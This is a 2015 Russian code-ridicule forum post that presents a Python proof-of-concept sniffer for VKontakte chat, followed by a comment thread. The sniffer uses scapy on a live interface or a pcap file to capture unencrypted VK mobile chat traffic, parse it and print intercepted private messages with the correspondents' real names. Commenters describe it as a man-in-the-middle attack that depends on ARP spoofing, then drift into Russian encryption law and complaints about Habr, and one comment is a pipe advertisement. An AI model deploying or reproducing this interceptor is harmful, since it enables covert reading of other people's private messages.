1. Python / Говнокод #18891

    −26

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    24. 24
    25. 25
    26. 26
    27. 27
    28. 28
    29. 29
    30. 30
    31. 31
    32. 32
    33. 33
    34. 34
    35. 35
    36. 36
    37. 37
    38. 38
    39. 39
    40. 40
    41. 41
    42. 42
    43. 43
    44. 44
    45. 45
    46. 46
    47. 47
    48. 48
    49. 49
    50. 50
    51. 51
    52. 52
    53. 53
    54. 54
    55. 55
    56. 56
    57. 57
    58. 58
    59. 59
    60. 60
    61. 61
    from scapy.all import *
import urllib2
import json
from time import sleep
from urlparse import urlparse
import os
import argparse
import sys

ts, num, friend_id, time, msg, msg_sended=0, 0, 0, 0, '', ''

# This is just PoC :)

# Special bytes, with them we can detect type of message
msg_recive = [49, 17] # Add here smth by yourself, if you detect new varibles
msg_send = [51, 3, 19] # Add here smth by yourself, if you detect new varibles

ap = argparse.ArgumentParser(epilog="Example:  python "+sys.argv[0]+" -i wlan0", prog=sys.argv[0], formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50))
ap.add_argument('--interface', '-i', nargs=1, help="Interface for listening packets")
ap.add_argument('--pcap', '-p', nargs=1, help="Pcap file for parse")
opts = ap.parse_args()

pcts = list()

def show_msgs(pack):
	try:

		if '{"ts":' in pack.load:			# find packet with response from vk server
			answ = json.loads(pack.load.split('\r\n\r\n')[1][:-2]) # load data as json
			for i in answ['updates']:
				if i[0] == 4: # we need array with msg data
					num, friend_id, time, msg = i[1], i[3], i[4], i[6] # parse data
					if msg in pcts:
						pass
					else:
						# detect message was from/to via special bytes
						pcts.append(msg)
						if i[2] in msg_recive:
							print '['+get_name_by_id(friend_id)+'] => ['+pack[IP].dst+']: '+msg
						elif i[2] in msg_send:
							print '['+pack[IP].dst+']'+' => ['+get_name_by_id(friend_id)+']: '+msg
					if len(pcts) > 10:
						pcts.pop(0)

		#print test
	except: pass

def get_name_by_id(id): # just print real name from vk by id
	get_name = json.loads(urllib2.urlopen('https://api.vk.com/method/getProfiles?uids='+str(id)).readlines()[0])
	friend_name = get_name["response"][0]["first_name"]+' '+get_name["response"][0]["last_name"]
	return friend_name


try:
	if opts.pcap != None:
	 	for i in PcapReader(opts.pcap[0]):
	 		show_msgs(i)
	if opts.interface[0] !=None:
	 	sniff(iface=opts.interface[0], prn=show_msgs)
except:
	pass

    Российский хэккер нашел уязвимость вконтакте

    Запостил: h1351212, 20 Октября 2015

    Комментарии (32) RSS

    • ava gost 20.10.2015 15:30 # +2

      Грешно смеяться над PoC'ами.
      Ответить

      • ava bormand 20.10.2015 17:42 # 0

        А может ОП хотел посмеяться над уязвимостью вконтакта, а не над эксплойтом?
        Ответить

        • ava bormand 20.10.2015 17:47 # 0

          P.S. Так чатик вконтача реально идёт по http, а не по https? Или я неправильно понял суть проблемы?
          Ответить

        • ava gost 20.10.2015 17:51 # 0

          Почитал описание на гитхабе, это типа MITM. Думал, там 0day тактики обхода HSTS, а это банальный ARP-спуфинг и вера в то, что остались еще люди, сидящее на http://vk.com.

          https://github.com/HeadLightSecurity/vkmitm, есличо.
          Ответить

          • ava 3_14dar 20.10.2015 17:53 # 0

            Ты наверно кабр невнимательно читал. Суть в том, что если юзер специально не поставил галочку на https в настройках (а таких внезапно большинство) то трафик идет нешифрованный.
            Ответить

            • ava bormand 20.10.2015 18:07 # 0

              Т.е. чатик идёт по http, даже если сама страница открыта как https://vk.com?
              Ответить

              • ava bormand 20.10.2015 18:44 # 0

                А, понял. Это чатик для мобил, а не на самом сайте.
                Ответить

                • ava gost 20.10.2015 18:49 # 0

                  Вот оно как. Я-то думал, что для таких крупных сайтов HTTPS абсолютно везде - это обязательное условие...
                  Ответить

                  • ava inkanus-gray 20.10.2015 19:33 # +3

                    Кстати, Луркоморье говорит, что РКН в этом году их заставил перейти с HTTPS на HTTP. Если они не врут, то это очень неприятный прецедент.

                    Помнится, в начале нулевых был закон, запрещающий использовать зашифрованные соединения без лицензии, выданной ФАПСИ. Потом ФАПСИ расформировали и про этот параноидальный закон забыли. Но похоже, что кто-то не теряет надежду вернуть этот закон в силу либо просто нагнетает.
                    Ответить

                    • ava 3_14dar 20.10.2015 22:21 # +2

                      Заставил в смысле что без этого заблокировали бы весь сайт а так у кого есть dpi могут блокировать отдельные страницы.

                      >Помнится, в начале нулевых был закон, запрещающий использовать зашифрованные соединения без лицензии, выданной ФАПСИ.
                      ШТООО? Пруф.
                      Ответить

                      • ava inkanus-gray 20.10.2015 22:56 # +1

                        Погуглил... Они ввели новое постановление вместо старого:
                        http://www.consultant.ru/document/cons_doc_LAW_128739/1aad6fe079cd2555c9c329d872dfca33764f738f/

                        И не отменён старый приказ:
                        https://ru.wikisource.org/wiki/Приказ_ФСБ_РФ_от_9_февраля_2005_г._№_66

                        P.S. А вот тот самый закон из 90-х:
                        http://www.e-nigma.ru/stat/u-334/
                        Ответить

              • ava 3_14dar 20.10.2015 19:02 # 0

                Читай статью на кабре
                Ответить

                • ava gost 20.10.2015 19:35 # 0

                  Какую статью-то?
                  Ответить

                  • ava 1024-- 20.10.2015 21:00 # 0

                    SELECT * FROM `habr` WHERE;
                    Все статьи читайте.
                    Ответить

                    • ava gost 20.10.2015 21:04 # +2

                      ERROR 1146 (42S02): Table 'habr' is not tort.
                      Ответить

                    • ava bormand 20.10.2015 21:04 # +1

                      Вот делать мне ещё нехуй... Я на хабру хожу только с внешних ресурсов, если что-то интересное найдут.
                      Ответить

                      • ava Stallman 20.10.2015 21:06 # 0

                        ТЫ ПРОСТО НИАСИЛИЛ НОДУ
                        Ответить

                        • ava bormand 20.10.2015 21:08 # 0

                          А чем мне тут нода поможет?
                          Ответить

                          • ava 1024-- 20.10.2015 21:10 # 0

                            Видимо, если осилить ноду, можно быстро писать на JS вместо долгого вдумчивого крестования, из-за чего освободится немного времени на хабр.
                            А на самом деле, это просто обострение экмаскриптянки у Stallmanа.
                            Ответить

                          • ava Stallman 20.10.2015 21:12 # +5

                            Не уверен как сейчас, но раньше на хомячкабре 95% статей были про NodeJS и MongoDB, а остальные 5% НЛПшная хуита в духе "как я был бомжем а теперь пишу на PHP".
                            Ответить

                            • ava Vasiliy 20.10.2015 22:09 # +1

                              ИМХО там сейчас больше рекламная площадка всякой нахуй не нужной еботы.
                              Ответить

                              • ava 3_14dar 21.10.2015 08:07 # 0

                                >всякой нахуй не нужной еботы.
                                Практически изначально там про всякоую нахуй не нужную еботу было
                                Ответить

                                • ava Vasiliy 21.10.2015 13:56 # +1

                                  я помню времена когда швабр не претендовал на илитное сообщество и там можно было путный мануальчик отыскать. Сейчас если на гк не подскажут не кто не подскажет.
                                  Все Q&A скатываются в сранное говно.
                                  Ответить

                                  • ava 3_14dar 21.10.2015 16:35 # 0

                                    Отыскать можно и сейчас, но на глагне редчайшая поеботина и уже очень давно.
                                    С каких пор кабр - QA?
                                    Ответить

                                    • ava 1024-- 21.10.2015 20:18 # +4

                                      > С каких пор кабр - QA?
                                      Надо так: С каких пор хабр - не QA?
                                      С осени 2013го, когда вопросы-ответы выгнали в тостер.
                                      Ответить

                                      • ava 3_14dar 22.10.2015 01:23 # +1

                                        Ну хз, не то чтобы это у меня тогда вызывало багет. Я этот ваш кабр вообще читаю только потому, что секулаба окончательно скатилась в сраное говно, а новости надо же где-то читать.
                                        Ответить

                                  • ava guest 14.11.2015 19:11 # 0

                                    Пизжуй в пхпклуб, там пхпмакаки спрашивают как сложить два числа
                                    Ответить

                • ava bormand 20.10.2015 19:39 # +2

                  Линк в студию. Тут не все хабр мониторят.
                  Ответить

      • ava 3_14dar 20.10.2015 17:55 # 0

        Вот уж да, хуже только лабы (хотя в metasploit код на уровне). Может, я уже постил код на перле - там функция кодирования в хекс с двумя строчками благодарности.
        Ответить

    • ava guest 13.01.2017 00:30 # 0

      Дополнительное отопление часто необходимо для создания комфортных условий как в частных, так и в многоквартирных домах.
      можно купить у нас <a href=http://sanwayopt.ru/truby-i-fitingi>полиэтиленовые трубы и фитинги. </a>
      Ответить

    Добавить комментарий